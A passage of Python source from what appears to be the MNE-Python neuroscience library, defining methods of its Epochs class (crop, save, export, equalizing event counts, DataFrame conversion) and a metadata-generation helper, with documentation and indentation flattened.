def _repr_html_(self):
from .html_templates import repr_templates_env
if self.baseline is None:
baseline = 'off'
else:
baseline = tuple([f'{b:.3f}' for b in self.baseline])
baseline = f'{baseline[0]} – {baseline[1]} sec'
if isinstance(self.event_id, dict):
event_strings = []
for k, v in sorted(self.event_id.items()):
n_events = sum(self.events[:, 2] == v)
event_strings.append(f'{k}: {n_events}')
elif isinstance(self.event_id, list):
event_strings = []
for k in self.event_id:
n_events = sum(self.events[:, 2] == k)
event_strings.append(f'{k}: {n_events}')
elif isinstance(self.event_id, int):
n_events = len(self.events[:, 2])
event_strings = [f'{self.event_id}: {n_events}']
else:
event_strings = None
t = repr_templates_env.get_template('epochs.html.jinja')
t = t.render(epochs=self, baseline=baseline, events=event_strings)
return t
@verbose
def crop(self, tmin=None, tmax=None, include_tmax=True, verbose=None):
"""Crop a time interval from the epochs.
Parameters
----------
tmin : float | None
Start time of selection in seconds.
tmax : float | None
End time of selection in seconds.
%(include_tmax)s
%(verbose)s
Returns
-------
epochs : instance of Epochs
The cropped epochs object, modified in-place.
Notes
-----
%(notes_tmax_included_by_default)s
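Examples
--------
A minimal sketch, assuming ``epochs`` is a preloaded `~mne.Epochs`
instance whose time interval contains 0 to 0.3 s:
>>> epochs.crop(tmin=0., tmax=0.3)  # doctest: +SKIP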
"""
# XXX this could be made to work on non-preloaded data...
_check_preload(self, 'Modifying data of epochs')
if tmin is None:
tmin = self.tmin
elif tmin < self.tmin:
warn('tmin is not in epochs time interval. tmin is set to '
'epochs.tmin')
tmin = self.tmin
if tmax is None:
tmax = self.tmax
elif tmax > self.tmax:
warn('tmax is not in epochs time interval. tmax is set to '
'epochs.tmax')
tmax = self.tmax
include_tmax = True
tmask = _time_mask(self.times, tmin, tmax, sfreq=self.info['sfreq'],
include_tmax=include_tmax)
self._set_times(self.times[tmask])
self._raw_times = self._raw_times[tmask]
self._data = self._data[:, :, tmask]
# Adjust rejection period
if self.reject_tmin is not None and self.reject_tmin < self.tmin:
logger.info(
f'reject_tmin is not in epochs time interval. '
f'Setting reject_tmin to epochs.tmin ({self.tmin} sec)')
self.reject_tmin = self.tmin
if self.reject_tmax is not None and self.reject_tmax > self.tmax:
logger.info(
f'reject_tmax is not in epochs time interval. '
f'Setting reject_tmax to epochs.tmax ({self.tmax} sec)')
self.reject_tmax = self.tmax
return self
def copy(self):
"""Return copy of Epochs instance.
Returns
-------
epochs : instance of Epochs
A copy of the object.
"""
return deepcopy(self)
def __deepcopy__(self, memodict):
"""Make a deepcopy."""
cls = self.__class__
result = cls.__new__(cls)
for k, v in self.__dict__.items():
# drop_log is immutable and _raw is private (and problematic to
# deepcopy)
if k in ('drop_log', '_raw', '_times_readonly'):
memodict[id(v)] = v
else:
v = deepcopy(v, memodict)
result.__dict__[k] = v
return result
@verbose
def save(self, fname, split_size='2GB', fmt='single', overwrite=False,
split_naming='neuromag', verbose=True):
"""Save epochs in a fif file.
Parameters
----------
fname : str
The name of the file, which should end with ``-epo.fif`` or
``-epo.fif.gz``.
split_size : str | int
Large raw files are automatically split into multiple pieces. This
parameter specifies the maximum size of each piece. If the
parameter is an integer, it specifies the size in Bytes. It is
also possible to pass a human-readable string, e.g., 100MB.
Note: Due to FIFF file limitations, the maximum split size is 2GB.
.. versionadded:: 0.10.0
fmt : str
Format to save data. Valid options are 'double' or
'single' for 64- or 32-bit float, or for 128- or
64-bit complex numbers respectively. Note: Data are processed with
double precision. If single precision is chosen, the saved data
will differ slightly due to the reduced precision.
.. versionadded:: 0.17
%(overwrite)s
To overwrite original file (the same one that was loaded),
data must be preloaded upon reading. This defaults to True in 0.18
but will change to False in 0.19.
.. versionadded:: 0.18
%(split_naming)s
.. versionadded:: 0.24
%(verbose)s
Notes
-----
Bad epochs will be dropped before saving the epochs to disk.
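Examples
--------
A minimal sketch; the file name is illustrative only and ``epochs``
is assumed to be an existing `~mne.Epochs` instance:
>>> epochs.save('sample-epo.fif', overwrite=True)  # doctest: +SKIP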
"""
check_fname(fname, 'epochs', ('-epo.fif', '-epo.fif.gz',
'_epo.fif', '_epo.fif.gz'))
# check for file existence and expand `~` if present
fname = _check_fname(fname=fname, overwrite=overwrite)
split_size_bytes = _get_split_size(split_size)
_check_option('fmt', fmt, ['single', 'double'])
# to know the length accurately. The get_data() call would drop
# bad epochs anyway
self.drop_bad()
# total_size tracks sizes that get split
# over_size tracks overhead (tags, things that get written to each)
if len(self) == 0:
warn('Saving epochs with no data')
total_size = 0
else:
d = self[0].get_data()
# this should be guaranteed by subclasses
assert d.dtype in ('>f8', '<f8', '>c16', '<c16')
total_size = d.nbytes * len(self)
self._check_consistency()
over_size = 0
if fmt == "single":
total_size //= 2 # 64bit data converted to 32bit before writing.
over_size += 32 # FIF tags
# Account for all the other things we write, too
# 1. meas_id block plus main epochs block
over_size += 132
# 2. measurement info (likely slight overestimate, but okay)
over_size += object_size(self.info) + 16 * len(self.info)
# 3. events and event_id in its own block
total_size += self.events.size * 4
over_size += len(_event_id_string(self.event_id)) + 72
# 4. Metadata in a block of its own
if self.metadata is not None:
total_size += len(_prepare_write_metadata(self.metadata))
over_size += 56
# 5. first sample, last sample, baseline
over_size += 40 * (self.baseline is not None) + 40
# 6. drop log: gets written to each, with IGNORE for ones that are
# not part of it. So make a fake one with all having entries.
drop_size = len(json.dumps(self.drop_log)) + 16
drop_size += 8 * (len(self.selection) - 1) # worst case: all but one
over_size += drop_size
# 7. reject params
reject_params = _pack_reject_params(self)
if reject_params:
over_size += len(json.dumps(reject_params)) + 16
# 8. selection
total_size += self.selection.size * 4
over_size += 16
# 9. end of file tags
over_size += _NEXT_FILE_BUFFER
logger.debug(f' Overhead size: {str(over_size).rjust(15)}')
logger.debug(f' Splittable size: {str(total_size).rjust(15)}')
logger.debug(f' Split size: {str(split_size_bytes).rjust(15)}')
# need at least one per
n_epochs = len(self)
n_per = total_size // n_epochs if n_epochs else 0
min_size = n_per + over_size
if split_size_bytes < min_size:
raise ValueError(
f'The split size {split_size} is too small to safely write '
'the epochs contents, minimum split size is '
f'{sizeof_fmt(min_size)} ({min_size} bytes)')
# This is like max(int(ceil(total_size / split_size)), 1) but cleaner
n_parts = max(
(total_size - 1) // (split_size_bytes - over_size) + 1, 1)
assert n_parts >= 1, n_parts
if n_parts > 1:
logger.info(f'Splitting into {n_parts} parts')
if n_parts > 100: # This must be an error
raise ValueError(
f'Split size {split_size} would result in writing '
f'{n_parts} files')
if len(self.drop_log) > 100000:
warn(f'epochs.drop_log contains {len(self.drop_log)} entries '
f'which will incur up to a {sizeof_fmt(drop_size)} writing '
f'overhead (per split file), consider using '
f'epochs.reset_drop_log_selection() prior to writing')
epoch_idxs = np.array_split(np.arange(n_epochs), n_parts)
for part_idx, epoch_idx in enumerate(epoch_idxs):
this_epochs = self[epoch_idx] if n_parts > 1 else self
# avoid missing event_ids in splits
this_epochs.event_id = self.event_id
_save_split(this_epochs, fname, part_idx, n_parts, fmt,
split_naming, overwrite)
@verbose
def export(self, fname, fmt='auto', *, overwrite=False, verbose=None):
"""Export Epochs to external formats.
Supported formats: EEGLAB (set, uses :mod:`eeglabio`)
%(export_warning)s
Parameters
----------
%(export_params_fname)s
%(export_params_fmt)s
%(overwrite)s
.. versionadded:: 0.24.1
%(verbose)s
Notes
-----
.. versionadded:: 0.24
%(export_warning_note_epochs)s
%(export_eeglab_note)s
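Examples
--------
A minimal sketch; the file name is illustrative only and ``epochs``
is assumed to be an existing `~mne.Epochs` instance (requires the
``eeglabio`` package):
>>> epochs.export('sample_epochs.set', overwrite=True)  # doctest: +SKIP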
"""
from .export import export_epochs
export_epochs(fname, self, fmt, overwrite=overwrite, verbose=verbose)
def equalize_event_counts(self, event_ids=None, method='mintime'):
"""Equalize the number of trials in each condition.
It tries to make the remaining epochs occur as close as possible in
time. This method works based on the idea that if there happened to be
some time-varying (like on the scale of minutes) noise characteristics
during a recording, they could be compensated for (to some extent) in
the equalization process. This method thus seeks to reduce any of
those effects by minimizing the differences in the times of the events
within a `~mne.Epochs` instance. For example, if one event type
occurred at time points ``[1, 2, 3, 4, 120, 121]`` and another one
at ``[3.5, 4.5, 120.5, 121.5]``, this method would remove the events at
times ``[1, 2]`` for the first event type – and not the events at times
``[120, 121]``.
Parameters
----------
event_ids : None | list | dict
The event types to equalize.
If ``None`` (default), equalize the counts of **all** event types
present in the `~mne.Epochs` instance.
If a list, each element can either be a string (event name) or a
list of strings. In the case where one of the entries is a list of
strings, event types in that list will be grouped together before
equalizing trial counts across conditions.
If a dictionary, the keys are considered as the event names whose
counts to equalize, i.e., passing ``dict(A=1, B=2)`` will have the
same effect as passing ``['A', 'B']``. This is useful if you intend
to pass an ``event_id`` dictionary that was used when creating
`~mne.Epochs`.
In the case where partial matching is used (using ``/`` in
the event names), the event types will be matched according to the
provided tags, that is, processing works as if the ``event_ids``
matched by the provided tags had been supplied instead.
The ``event_ids`` must identify non-overlapping subsets of the
epochs.
method : str
If ``'truncate'``, events will be truncated from the end of each
type of events. If ``'mintime'``, timing differences between each
event type will be minimized.
Returns
-------
epochs : instance of Epochs
The modified instance. It is modified in-place.
indices : array of int
Indices from the original events list that were dropped.
Notes
-----
For example (if ``epochs.event_id`` was ``{'Left': 1, 'Right': 2,
'Nonspatial': 3}``):
epochs.equalize_event_counts([['Left', 'Right'], 'Nonspatial'])
would equalize the number of trials in the ``'Nonspatial'`` condition
with the total number of trials in the ``'Left'`` and ``'Right'``
conditions combined.
If multiple indices are provided (e.g. ``'Left'`` and ``'Right'`` in
the example above), it is not guaranteed that after equalization the
conditions will contribute equally. E.g., it is possible to end up
with 70 ``'Nonspatial'`` epochs, 69 ``'Left'`` and 1 ``'Right'``.
.. versionchanged:: 0.23
Default to equalizing all events in the passed instance if no
event names were specified explicitly.
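Examples
--------
A minimal sketch, assuming ``epochs`` contains conditions named
``'auditory'`` and ``'visual'`` (the condition names are illustrative
only); passing no arguments equalizes all conditions:
>>> epochs, dropped = epochs.equalize_event_counts(['auditory', 'visual'])  # doctest: +SKIP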
"""
from collections.abc import Iterable
_validate_type(event_ids, types=(Iterable, None),
item_name='event_ids', type_name='list-like or None')
if isinstance(event_ids, str):
raise TypeError(f'event_ids must be list-like or None, but '
f'received a string: {event_ids}')
if event_ids is None:
event_ids = list(self.event_id)
elif not event_ids:
raise ValueError('event_ids must have at least one element')
if not self._bad_dropped:
self.drop_bad()
# figure out how to equalize
eq_inds = list()
# deal with hierarchical tags
ids = self.event_id
orig_ids = list(event_ids)
tagging = False
if "/" in "".join(ids):
# make string inputs a list of length 1
event_ids = [[x] if isinstance(x, str) else x
for x in event_ids]
for ids_ in event_ids: # check if tagging is attempted
if any([id_ not in ids for id_ in ids_]):
tagging = True
# 1. treat everything that's not in event_id as a tag
# 2a. for tags, find all the event_ids matched by the tags
# 2b. for non-tag ids, just pass them directly
# 3. do this for every input
event_ids = [[k for k in ids
if all((tag in k.split("/")
for tag in id_))] # ids matching all tags
if all(id__ not in ids for id__ in id_)
else id_ # straight pass for non-tag inputs
for id_ in event_ids]
for ii, id_ in enumerate(event_ids):
if len(id_) == 0:
raise KeyError(f"{orig_ids[ii]} not found in the epoch "
"object's event_id.")
elif len({sub_id in ids for sub_id in id_}) != 1:
err = ("Don't mix hierarchical and regular event_ids"
" like in \'%s\'." % ", ".join(id_))
raise ValueError(err)
# raise for non-orthogonal tags
if tagging is True:
events_ = [set(self[x].events[:, 0]) for x in event_ids]
doubles = events_[0].intersection(events_[1])
if len(doubles):
raise ValueError("The two sets of epochs are "
"overlapping. Provide an "
"orthogonal selection.")
for eq in event_ids:
eq_inds.append(self._keys_to_idx(eq))
event_times = [self.events[e, 0] for e in eq_inds]
indices = _get_drop_indices(event_times, method)
# need to re-index indices
indices = np.concatenate([e[idx] for e, idx in zip(eq_inds, indices)])
self.drop(indices, reason='EQUALIZED_COUNT')
# actually remove the indices
return self, indices
@verbose
def to_data_frame(self, picks=None, index=None,
scalings=None, copy=True, long_format=False,
time_format='ms', *, verbose=None):
"""Export data in tabular structure as a pandas DataFrame.
Channels are converted to columns in the DataFrame. By default,
additional columns "time", "epoch" (epoch number), and "condition"
(epoch event description) are added, unless ``index`` is not ``None``
(in which case the columns specified in ``index`` will be used to form
the DataFrame's index instead).
Parameters
----------
%(picks_all)s
%(df_index_epo)s
Valid string values are 'time', 'epoch', and 'condition'.
Defaults to ``None``.
%(df_scalings)s
%(df_copy)s
%(df_longform_epo)s
%(df_time_format)s
.. versionadded:: 0.20
%(verbose)s
Returns
-------
%(df_return)s
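Examples
--------
A minimal sketch, assuming ``epochs`` is an existing `~mne.Epochs`
instance and pandas is installed:
>>> df = epochs.to_data_frame()  # doctest: +SKIP
>>> df_long = epochs.to_data_frame(index=['condition', 'epoch'],
...                                long_format=True)  # doctest: +SKIP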
"""
# check pandas once here, instead of in each private utils function
pd = _check_pandas_installed() # noqa
# arg checking
valid_index_args = ['time', 'epoch', 'condition']
valid_time_formats = ['ms', 'timedelta']
index = _check_pandas_index_arguments(index, valid_index_args)
time_format = _check_time_format(time_format, valid_time_formats)
# get data
picks = _picks_to_idx(self.info, picks, 'all', exclude=())
data = self.get_data()[:, picks, :]
times = self.times
n_epochs, n_picks, n_times = data.shape
data = np.hstack(data).T # (time*epochs) x signals
if copy:
data = data.copy()
data = _scale_dataframe_data(self, data, picks, scalings)
# prepare extra columns / multiindex
mindex = list()
times = np.tile(times, n_epochs)
times = _convert_times(self, times, time_format)
mindex.append(('time', times))
rev_event_id = {v: k for k, v in self.event_id.items()}
conditions = [rev_event_id[k] for k in self.events[:, 2]]
mindex.append(('condition', np.repeat(conditions, n_times)))
mindex.append(('epoch', np.repeat(self.selection, n_times)))
assert all(len(mdx) == len(mindex[0]) for mdx in mindex)
# build DataFrame
df = _build_data_frame(self, data, picks, long_format, mindex, index,
default_index=['condition', 'epoch', 'time'])
return df
def as_type(self, ch_type='grad', mode='fast'):
"""Compute virtual epochs using interpolated fields.
.. Warning:: Using virtual epochs to compute inverse can yield
unexpected results. The virtual channels have ``'_v'`` appended
at the end of the names to emphasize that the data contained in
them are interpolated.
Parameters
----------
ch_type : str
The destination channel type. It can be 'mag' or 'grad'.
mode : str
Either ``'accurate'`` or ``'fast'``, determines the quality of the
Legendre polynomial expansion used. ``'fast'`` should be sufficient
for most applications.
Returns
-------
epochs : instance of mne.EpochsArray
The transformed epochs object containing only virtual channels.
Notes
-----
This method returns a copy and does not modify the data it
operates on. It also returns an EpochsArray instance.
.. versionadded:: 0.20.0
"""
from .forward import _as_meg_type_inst
return _as_meg_type_inst(self, ch_type=ch_type, mode=mode)
def _drop_log_stats(drop_log, ignore=('IGNORED',)):
"""Compute drop log stats.
Parameters
----------
drop_log : list of list
Epoch drop log from Epochs.drop_log.
ignore : list
The drop reasons to ignore.
Returns
-------
perc : float
Total percentage of epochs dropped.
"""
if not isinstance(drop_log, tuple) or \
not all(isinstance(d, tuple) for d in drop_log) or \
not all(isinstance(s, str) for d in drop_log for s in d):
raise TypeError('drop_log must be a tuple of tuple of str')
perc = 100 * np.mean([len(d) > 0 for d in drop_log
if not any(r in ignore for r in d)])
return perc
def make_metadata(events, event_id, tmin, tmax, sfreq,
row_events=None, keep_first=None, keep_last=None):
"""Generate metadata from events for use with `mne.Epochs`.
This function mimics the epoching process (it constructs time windows
around time-locked "events of interest") and collates information about
any other events that occurred within those time windows. The information
is returned as a :class:`pandas.DataFrame` suitable for use as
`~mne.Epochs` metadata: one row per time-locked event, and columns
indicating presence/absence and latency of each ancillary event type.
The function will also return a new ``events`` array and ``event_id``
dictionary that correspond to the generated metadata.
Parameters
----------
events : array, shape (m, 3)
The :term:`events array <events>`. By default, the returned metadata
:class:`~pandas.DataFrame` will have as many rows as the events array.
To create rows for only a subset of events, pass the ``row_events``
parameter.
event_id : dict
A mapping from event names (keys) to event IDs (values). The event
names will be incorporated as columns of the returned metadata
:class:`~pandas.DataFrame`.
tmin, tmax : float
Start and end of the time interval for metadata generation in seconds,
relative to the time-locked event of the respective time window.
.. note::
If you are planning to attach the generated metadata to
`~mne.Epochs` and intend to include only events that fall inside
your epochs time interval, pass the same ``tmin`` and ``tmax``
values here as you use for your epochs.
sfreq : float
The sampling frequency of the data from which the events array was
extracted.
row_events : list of str | str | None
Event types around which to create the time windows / for which to
create **rows** in the returned metadata :class:`pandas.DataFrame`. If
provided, the string(s) must be keys of ``event_id``. If ``None``
(default), rows are created for **all** event types present in
``event_id``.
keep_first : str | list of str | None
Specify subsets of :term:`hierarchical event descriptors` (HEDs,
inspired by :footcite:`BigdelyShamloEtAl2013`) matching events of which
the **first occurrence** within each time window shall be stored in
addition to the original events.
.. note::
There is currently no way to retain **all** occurrences of a
repeated event. The ``keep_first`` parameter can be used to specify
subsets of HEDs, effectively creating a new event type that is the
union of all events types described by the matching HED pattern.
Only the very first event of this set will be kept.
For example, you might have two response events types,
``response/left`` and ``response/right``; and in trials with both
responses occurring, you want to keep only the first response. In this
case, you can pass ``keep_first='response'``. This will add two new
columns to the metadata: ``response``, indicating at what **time** the
event occurred, relative to the time-locked event; and
``first_response``, stating which **type** (``'left'`` or ``'right'``)
of event occurred.
To match specific subsets of HEDs describing different sets of events,
pass a list of these subsets, e.g.
``keep_first=['response', 'stimulus']``. If ``None`` (default), no
event aggregation will take place and no new columns will be created.
.. note::
By default, this function will always retain the first instance
of any event in each time window. For example, if a time window
contains two ``'response'`` events, the generated ``response``
column will automatically refer to the first of the two events. In
this specific case, it is therefore **not** necessary to make use of
the ``keep_first`` parameter – unless you need to differentiate
between two types of responses, like in the example above.
keep_last : list of str | None
Same as ``keep_first``, but for keeping only the **last** occurrence
of matching events. The column indicating the **type** of an event
``myevent`` will be named ``last_myevent``.
Returns
-------
metadata : pandas.DataFrame
Metadata for each row event, with the following columns:
- ``event_name``, with strings indicating the name of the time-locked
event ("row event") for that specific time window
- one column per event type in ``event_id``, with the same name; floats
indicating the latency of the event in seconds, relative to the
time-locked event
- if applicable, additional columns named after the ``keep_first`` and
``keep_last`` event types; floats indicating the latency of the
event in seconds, relative to the time-locked event
- if applicable, additional columns ``first_{event_type}`` and
``last_{event_type}`` for ``keep_first`` and ``keep_last`` event
types, respectively; the values will be strings indicating which event
types were matched by the provided HED patterns
events : array, shape (n, 3)
The events corresponding to the generated metadata, i.e. one
time-locked event per row.
event_id : dict
The event dictionary corresponding to the new events array. This will
be identical to the input dictionary unless ``row_events`` is supplied,
in which case it will only contain the events provided there.
Notes
-----
The time window used for metadata generation need not correspond to the
time window used to create the `~mne.Epochs`, to which the metadata will
be attached; it may well be much shorter or longer, or not overlap at all,
if desired. This can be useful, for example, to include events that occurred
before or after an epoch, e.g. during the inter-trial interval.
.. versionadded:: 0.23
References
----------
.. footbibliography::
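Examples
--------
A minimal sketch, assuming ``raw``, ``events``, and ``event_id`` already
exist (e.g. from `mne.io.read_raw_fif` and `mne.find_events`); the time
window matches the epochs that will be created:
>>> metadata, new_events, new_event_id = make_metadata(
...     events=events, event_id=event_id, tmin=-0.2, tmax=0.5,
...     sfreq=raw.info['sfreq'])  # doctest: +SKIP
>>> epochs = Epochs(raw, new_events, new_event_id, tmin=-0.2, tmax=0.5,
...                 metadata=metadata)  # doctest: +SKIP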
"""
pd = _check_pandas_installed()
_validate_type(event_id, types=(dict,), item_name='event_id')
_validate_type(row_events, types=(None, str, list, tuple),
item_name='row_events')
_validate_type(keep_first, types=(None, str, list, tuple),
item_name='keep_first')
_validate_type(keep_last, types=(None, str, list, tuple),
item_name='keep_last')
if not event_id:
raise ValueError('event_id dictionary must contain at least one entry')
def _ensure_list(x):
if x is None:
return []
elif isinstance(x, str):
return [x]
else:
return list(x)
row_events = _ensure_list(row_events)
keep_first = _ensure_list(keep_first)
keep_last = _ensure_list(keep_last)
keep_first_and_last = set(keep_first) & set(keep_last)
if keep_first_and_last:
raise ValueError(f'The event names in keep_first and keep_last must '
f'be mutually exclusive. Specified in both: '
f'{", ".join(sorted(keep_first_and_last))}')
del keep_first_and_last
for param_name, values in dict(keep_first=keep_first,
keep_last=keep_last).items():
for first_last_event_name in values:
try:
match_event_names(event_id, [first_last_event_name])
except KeyError:
raise ValueError(
f'Event "{first_last_event_name}", specified in '
f'{param_name}, cannot be found in event_id dictionary')
event_name_diff = sorted(set(row_events) - set(event_id.keys()))
if event_name_diff:
raise ValueError(
f'Present in row_events, but missing from event_id: '
f'{", ".join(event_name_diff)}')
del event_name_diff
# First and last sample of each epoch, relative to the time-locked event
# This follows the approach taken in mne.Epochs
start_sample = int(round(tmin * sfreq))
stop_sample = int(round(tmax * sfreq)) + 1
# Make indexing easier
# We create the DataFrame before subsetting the events so we end up with
# indices corresponding to the original event indices. Not used for now,
# but might come in handy sometime later
events_df = pd.DataFrame(events, columns=('sample', 'prev_id', 'id'))
id_to_name_map = {v: k for k, v in event_id.items()}
# Only keep events that are of interest
events = events[np.in1d(events[:, 2], list(event_id.values()))]
events_df = events_df.loc[events_df['id'].isin(event_id.values()), :]
# Prepare & condition the metadata DataFrame
# Avoid column name duplications if the exact same event name appears in
# event_id.keys() and keep_first / keep_last simultaneously
keep_first_cols = [col for col in keep_first if col not in event_id]
keep_last_cols = [col for col in keep_last if col not in event_id]
first_cols = [f'first_{col}' for col in keep_first_cols]
last_cols = [f'last_{col}' for col in keep_last_cols]
columns = ['event_name',
*event_id.keys(),
*keep_first_cols,
*keep_last_cols,
*first_cols,
*last_cols]
data = np.empty((len(events_df), len(columns)))
metadata = pd.DataFrame(data=data, columns=columns, index=events_df.index)
# Event names
metadata.iloc[:, 0] = ''
# Event times
start_idx = 1
stop_idx = (start_idx + len(event_id.keys()) +
len(keep_first_cols + keep_last_cols))
metadata.iloc[:, start_idx:stop_idx] = np.nan
# keep_first and keep_last names
start_idx = stop_idx
metadata.iloc[:, start_idx:] = None
# We're all set, let's iterate over all events and fill in the
# respective cells in the metadata. We will subset this to include only
# `row_events` later
for row_event in events_df.itertuples(name='RowEvent'):
row_idx = row_event.Index
metadata.loc[row_idx, 'event_name'] = \
id_to_name_map[row_event.id]
# Determine which events fall into the current epoch
window_start_sample = row_event.sample + start_sample
window_stop_sample = row_event.sample + stop_sample
events_in_window = events_df.loc[
(events_df['sample'] >= window_start_sample) &
(events_df['sample'] <= window_stop_sample), :]
assert not events_in_window.empty
# Store the metadata
for event in events_in_window.itertuples(name='Event'):
event_sample = event.sample - row_event.sample
event_time = event_sample / sfreq
event_time = 0 if np.isclose(event_time, 0) else event_time
event_name = id_to_name_map[event.id]
if not np.isnan(metadata.loc[row_idx, event_name]):
# Event already exists in current time window!
assert metadata.loc[row_idx, event_name] <= event_time
if event_name not in keep_last:
continue
metadata.loc[row_idx, event_name] = event_time
# Handle keep_first and keep_last event aggregation
for event_group_name in keep_first + keep_last:
if event_name not in match_event_names(
event_id, [event_group_name]
):
continue
if event_group_name in keep_first:
first_last_col = f'first_{event_group_name}'
else:
first_last_col = f'last_{event_group_name}'
old_time = metadata.loc[row_idx, event_group_name]
if not np.isnan(old_time):
if ((event_group_name in keep_first and
old_time <= event_time) or
(event_group_name in keep_last and
old_time >= event_time)):
continue
if event_group_name not in event_id:
# This is an HED. Strip redundant information from the
# event name
name = (event_name
.replace(event_group_name, '')
.replace('//', '/')
.strip('/'))
metadata.loc[row_idx, first_last_col] = name
del name
metadata.loc[row_idx, event_group_name] = event_time
# Only keep rows of interest
if row_events:
event_id_timelocked = {name: val for name, val in event_id.items()
if name in row_events}
events = events[np.in1d(events[:, 2],
list(event_id_timelocked.values()))]
metadata = metadata.loc[
metadata['event_name'].isin(event_id_timelocked)]
assert len(events) == len(metadata)
event_id = event_id_timelocked
return metadata, events, event_id
@fill_doc
class Epochs(BaseEpochs):
"""Epochs extracted from a Raw instance.
Parameters
----------
%(epochs_raw)s
%(events_epochs)s
%(event_id)s
%(epochs_tmin_tmax)s
%(baseline_epochs)s
Defaults to ``(None, 0)``, i.e. beginning of the data until
time point zero.
%(picks_all)s
preload : bool
%(epochs_preload)s
%(reject_epochs)s
%(flat)s
%(proj_epochs)s
%(decim)s
%(epochs_reject_tmin_tmax)s
%(epochs_detrend)s
%(epochs_on_missing)s
%(reject_by_annotation_epochs)s
%(epochs_metadata)s
%(epochs_event_repeated)s
%(verbose)s
Attributes
----------
%(info_not_none)s
event_id : dict
Names of conditions corresponding to event_ids.
ch_names : list of string
List of channel names.
selection : array
List of indices of selected events (not dropped or ignored etc.). For
example, if the original event array had 4 events and the second event
has been dropped, this attribute would be np.array([0, 2, 3]).
preload : bool
Indicates whether epochs are in memory.
drop_log : tuple of tuple
A tuple of the same length as the event array used to initialize the
Epochs object. If the i-th original event is still part of the
selection, drop_log[i] will be an empty tuple; otherwise it will be
a tuple of the reasons the event is no longer in the selection, e.g.:
- 'IGNORED'
If it isn't part of the current subset defined by the user
- 'NO_DATA' or 'TOO_SHORT'
If the epoch didn't contain enough data, or the names of channels that
exceeded the amplitude threshold
- 'EQUALIZED_COUNTS'
See :meth:`~mne.Epochs.equalize_event_counts`
- 'USER'
For user-defined reasons (see :meth:`~mne.Epochs.drop`).
filename : str
The filename of the object.
times : ndarray
Time vector in seconds. Goes from ``tmin`` to ``tmax``. Time interval
between consecutive time samples is equal to the inverse of the
sampling frequency.
See Also
--------
mne.epochs.combine_event_ids
mne.Epochs.equalize_event_counts
Notes
-----
When accessing data, Epochs are detrended, baseline-corrected, and
decimated, then projectors are (optionally) applied.
For indexing and slicing using ``epochs[...]``, see
:meth:`mne.Epochs.__getitem__`.
All methods for iteration over objects (using :meth:`mne.Epochs.__iter__`,
:meth:`mne.Epochs.iter_evoked` or :meth:`mne.Epochs.next`) use the same
internal state.
If ``event_repeated`` is set to ``'merge'``, the coinciding events
(duplicates) will be merged into a single event_id and assigned a new
id_number as::
event_id['{event_id_1}/{event_id_2}/...'] = new_id_number
For example with the event_id ``{'aud': 1, 'vis': 2}`` and the events
``[[0, 0, 1], [0, 0, 2]]``, the "merge" behavior will update both event_id
and events to be: ``{'aud/vis': 3}`` and ``[[0, 0, 3]]`` respectively.
There is limited support for :class:`~mne.Annotations` in the
:class:`~mne.Epochs` class. Currently annotations that are present in the
:class:`~mne.io.Raw` object will be preserved in the resulting
:class:`~mne.Epochs` object, but:
1. It is not yet possible to add annotations
to the Epochs object programmatically (via code) or interactively
(through the plot window)
2. Concatenating :class:`~mne.Epochs` objects
that contain annotations is not supported, and any annotations will
be dropped when concatenating.
3. Annotations will be lost on save.
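Examples
--------
A minimal sketch, assuming ``raw`` is an existing `~mne.io.Raw`
instance with a stimulus channel named ``'STI 014'`` (the channel
name and event code are illustrative only):
>>> events = mne.find_events(raw, stim_channel='STI 014')  # doctest: +SKIP
>>> epochs = mne.Epochs(raw, events, event_id={'auditory': 1}, tmin=-0.2,
...                     tmax=0.5, baseline=(None, 0), preload=True)  # doctest: +SKIP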
"""
@verbose
def __init__(self, raw, events, event_id=None, tmin=-0.2, tmax=0.5,
baseline=(None, 0), picks=None, preload=False, reject=None,
flat=None, proj=True, decim=1, reject_tmin=None,
reject_tmax=None, detrend=None, on_missing='raise',
reject_by_annotation=True, metadata=None,
event_repeated='error', verbose=None): # noqa: D102
if not isinstance(raw, BaseRaw):
raise ValueError('The first argument to `Epochs` must be an '
'instance of mne.io.BaseRaw')
info = deepcopy(raw.info)
# proj is on when applied in Raw
proj = proj or raw.proj
self.reject_by_annotation = reject_by_annotation
# keep track of original sfreq (needed for annotations)
raw_sfreq = raw.info['sfreq']
# call BaseEpochs constructor
super(Epochs, self).__init__(
info, None, events, event_id, tmin, tmax,
metadata=metadata, baseline=baseline, raw=raw, picks=picks,
reject=reject, flat=flat, decim=decim, reject_tmin=reject_tmin,
reject_tmax=reject_tmax, detrend=detrend,
proj=proj, on_missing=on_missing, preload_at_end=preload,
event_repeated=event_repeated, verbose=verbose,
raw_sfreq=raw_sfreq, annotations=raw.annotations)
@verbose
def _get_epoch_from_raw(self, idx, verbose=None):
"""Load one epoch from disk.
Returns
-------
data : array | str | None
If string, it's details on rejection reason.
If array, it's the data in the desired range (good segment)
If None, it means no data is available.
"""
if self._raw is None:
# This should never happen, as raw=None only if preload=True
raise ValueError('An error has occurred, no valid raw file found. '
'Please report this to the mne-python '
'developers.')
sfreq = self._raw.info['sfreq']
event_samp = self.events[idx, 0]
# Read a data segment from "start" to "stop" in samples
first_samp = self._raw.first_samp
start = int(round(event_samp + self._raw_times[0] * sfreq))
start -= first_samp
stop = start + len(self._raw_times)
# reject_tmin, and reject_tmax need to be converted to samples to
# check the reject_by_annotation boundaries: reject_start, reject_stop
reject_tmin = self.reject_tmin
if reject_tmin is None:
reject_tmin = self._raw_times[0]
reject_start = int(round(event_samp + reject_tmin * sfreq))
reject_start -= first_samp
reject_tmax = self.reject_tmax
if reject_tmax is None:
reject_tmax = self._raw_times[-1]
diff = int(round((self._raw_times[-1] - reject_tmax) * sfreq))
reject_stop = stop - diff
logger.debug(' Getting epoch for %d-%d' % (start, stop))
data = self._raw._check_bad_segment(start, stop, self.picks,
reject_start, reject_stop,
self.reject_by_annotation)
return data
@fill_doc
class EpochsArray(BaseEpochs):
"""Epochs object from numpy array.
Parameters
----------
data : array, shape (n_epochs, n_channels, n_times)
The channels' time series for each epoch. See notes for proper units of
measure.
%(info_not_none)s Consider using :func:`mne.create_info` to populate this
structure.
events : None | array of int, shape (n_events, 3)
The events typically returned by the read_events function.
If some events don't match the events of interest as specified
by event_id, they will be marked as 'IGNORED' in the drop log.
If None (default), all event values are set to 1 and event time-samples
are set to range(n_epochs).
tmin : float
Start time before event. If nothing provided, defaults to 0.
event_id : int | list of int | dict | None
The id of the event to consider. If dict,
the keys can later be used to access associated events. Example:
dict(auditory=1, visual=3). If int, a dict will be created with
the id as string. If a list, all events with the IDs specified
in the list are used. If None, all events will be used, and a
